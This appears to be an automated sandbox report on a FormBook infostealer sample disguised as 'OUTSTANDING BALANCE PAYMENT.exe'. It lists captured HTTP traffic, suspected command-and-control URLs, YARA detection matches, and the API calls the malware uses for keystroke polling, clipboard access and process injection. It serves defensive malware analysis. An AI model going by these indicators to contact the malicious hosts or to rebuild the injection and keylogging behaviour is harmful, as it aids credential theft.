20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 48 6f 73 70 65 64 61 67 65 6d 20 64 65 20 53 69 74 65 20 63 6f 6d 20 44 6f 6d c3 ad 6e 69 6f 20 47 72 c3 a1 74 69 73 20 2d 20 48 6f 73 74 47 61 74 6f 72 3c 2f 74 69 74 6c 65 3e Data Ascii: 939<!DOCTYPE html><html lang="pt-BR"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="format-detection" content="telephone=no"> <meta name="robots" content="noindex"> <title>Hospedagem de Site com Domnio Grtis - HostGator</title>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 27 Nov 2024 07:56:51 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 27 Nov 2024 07:56:54 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 27 Nov 2024 07:56:56 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 27 Nov 2024 07:56:59 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 27 Nov 2024 07:57:06 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 27 Nov 2024 07:57:09 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 27 Nov 2024 07:57:12 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 27 Nov 2024 07:57:15 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: svchost.exe, 00000002.00000003.2348113087.0000000003048000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347953468.000000000301A000.00000004.00000020.00020000.00000000.sdmp, QvLFrfAuvuCLc.exe, 00000004.00000002.4595971404.0000000000D08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://server/get.asp
                Source: bitsadmin.exe, 00000005.00000002.4599573362.000000000481C000.00000004.10000000.00040000.00000000.sdmp, bitsadmin.exe, 00000005.00000002.4601549732.0000000006680000.00000004.00000800.00020000.00000000.sdmp, QvLFrfAuvuCLc.exe, 00000006.00000002.4597320068.0000000003BFC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.amayavp.xyz/d9ku/?6dr=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2
                Source: QvLFrfAuvuCLc.exe, 00000006.00000002.4599520546.00000000056B4000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.duwixushx.xyz
                Source: QvLFrfAuvuCLc.exe, 00000006.00000002.4599520546.00000000056B4000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.duwixushx.xyz/q0vk/
                Source: bitsadmin.exe, 00000005.00000003.2587885669.00000000080C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: bitsadmin.exe, 00000005.00000002.4599573362.0000000004366000.00000004.10000000.00040000.00000000.sdmp, QvLFrfAuvuCLc.exe, 00000006.00000002.4597320068.0000000003746000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn-bj.trafficmanager.net/?h=
                Source: bitsadmin.exe, 00000005.00000003.2587885669.00000000080C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: bitsadmin.exe, 00000005.00000003.2587885669.00000000080C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: bitsadmin.exe, 00000005.00000003.2587885669.00000000080C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: bitsadmin.exe, 00000005.00000003.2587885669.00000000080C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: bitsadmin.exe, 00000005.00000003.2587885669.00000000080C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: bitsadmin.exe, 00000005.00000003.2587885669.00000000080C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: bitsadmin.exe, 00000005.00000002.4594142282.0000000003154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oau
                Source: bitsadmin.exe, 00000005.00000002.4594142282.0000000003154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: bitsadmin.exe, 00000005.00000002.4594142282.0000000003154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: bitsadmin.exe, 00000005.00000003.2577600251.00000000080AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: bitsadmin.exe, 00000005.00000002.4594142282.0000000003154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
                Source: bitsadmin.exe, 00000005.00000002.4594142282.0000000003154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: bitsadmin.exe, 00000005.00000002.4594142282.0000000003154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: bitsadmin.exe, 00000005.00000002.4594142282.0000000003154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: bitsadmin.exe, 00000005.00000002.4594142282.0000000003154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: bitsadmin.exe, 00000005.00000003.2587885669.00000000080C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: bitsadmin.exe, 00000005.00000003.2587885669.00000000080C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: bitsadmin.exe, 00000005.00000002.4599573362.0000000005188000.00000004.10000000.00040000.00000000.sdmp, QvLFrfAuvuCLc.exe, 00000006.00000002.4597320068.0000000004568000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hostgator.com.br
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002D6B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_002D6B0C
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002D6D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_002D6D07
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002D6B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_002D6B0C
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002C2B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_002C2B37
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002EF7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_002EF7FF

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.4596765676.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2392608967.0000000007B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4599520546.0000000005600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4592072566.0000000003010000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2379572846.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4596524893.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4597050581.0000000002740000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2384044672.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Binary is likely a compiled AutoIt script file
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: This is a third-party compiled AutoIt script.0_2_00283D19
                Source: OUTSTANDING BALANCE PAYMENT.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: OUTSTANDING BALANCE PAYMENT.exe, 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_c8e072d6-1
                Source: OUTSTANDING BALANCE PAYMENT.exe, 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: +SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_4be403ee-d
                Source: OUTSTANDING BALANCE PAYMENT.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_f9d193bb-8
                Source: OUTSTANDING BALANCE PAYMENT.exeString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_f8b2558d-e
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: OUTSTANDING BALANCE PAYMENT.exe
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042CA93 NtClose,2_2_0042CA93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672B60 NtClose,LdrInitializeThunk,2_2_03672B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03672DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036735C0 NtCreateMutant,LdrInitializeThunk,2_2_036735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03674340 NtSetContextThread,2_2_03674340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03674650 NtSuspendThread,2_2_03674650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672BE0 NtQueryValueKey,2_2_03672BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672BF0 NtAllocateVirtualMemory,2_2_03672BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672BA0 NtEnumerateValueKey,2_2_03672BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672B80 NtQueryInformationFile,2_2_03672B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672AF0 NtWriteFile,2_2_03672AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672AD0 NtReadFile,2_2_03672AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672AB0 NtWaitForSingleObject,2_2_03672AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672F60 NtCreateProcessEx,2_2_03672F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672F30 NtCreateSection,2_2_03672F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672FE0 NtCreateFile,2_2_03672FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672FA0 NtQuerySection,2_2_03672FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672FB0 NtResumeThread,2_2_03672FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672F90 NtProtectVirtualMemory,2_2_03672F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672E30 NtWriteVirtualMemory,2_2_03672E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672EE0 NtQueueApcThread,2_2_03672EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672EA0 NtAdjustPrivilegesToken,2_2_03672EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672E80 NtReadVirtualMemory,2_2_03672E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672D30 NtUnmapViewOfSection,2_2_03672D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672D00 NtSetInformationFile,2_2_03672D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672D10 NtMapViewOfSection,2_2_03672D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672DD0 NtDelayExecution,2_2_03672DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672DB0 NtEnumerateKey,2_2_03672DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672C60 NtCreateKey,2_2_03672C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672C70 NtFreeVirtualMemory,2_2_03672C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672C00 NtQueryInformationProcess,2_2_03672C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672CF0 NtOpenProcess,2_2_03672CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672CC0 NtQueryVirtualMemory,2_2_03672CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672CA0 NtQueryInformationToken,2_2_03672CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03673010 NtOpenDirectoryObject,2_2_03673010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03673090 NtSetValueKey,2_2_03673090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036739B0 NtGetContextThread,2_2_036739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03673D70 NtOpenThread,2_2_03673D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03673D10 NtOpenProcessToken,2_2_03673D10
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002C6606: CreateFileW,DeviceIoControl,CloseHandle,0_2_002C6606
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002BACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_002BACC5
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002C79D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_002C79D3
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002AB0430_2_002AB043
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002932000_2_00293200
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00293B700_2_00293B70
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002B410F0_2_002B410F
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002A02A40_2_002A02A4
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002B038E0_2_002B038E
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_0028E3E30_2_0028E3E3
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002B467F0_2_002B467F
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002A06D90_2_002A06D9
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002EAACE0_2_002EAACE
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002B4BEF0_2_002B4BEF
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002ACCC10_2_002ACCC1
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00286F070_2_00286F07
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_0028AF500_2_0028AF50
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_0029B11F0_2_0029B11F
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002E31BC0_2_002E31BC
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002AD1B90_2_002AD1B9
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002A123A0_2_002A123A
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002B724D0_2_002B724D
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002893F00_2_002893F0
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002C13CA0_2_002C13CA
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_0029F5630_2_0029F563
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002CB6CC0_2_002CB6CC
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002896C00_2_002896C0
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002877B00_2_002877B0
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002EF7FF0_2_002EF7FF
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002B79C90_2_002B79C9
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_0029FA570_2_0029FA57
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00289B600_2_00289B60
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00287D190_2_00287D19
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_0029FE6F0_2_0029FE6F
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002A9ED00_2_002A9ED0
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00287FA30_2_00287FA3
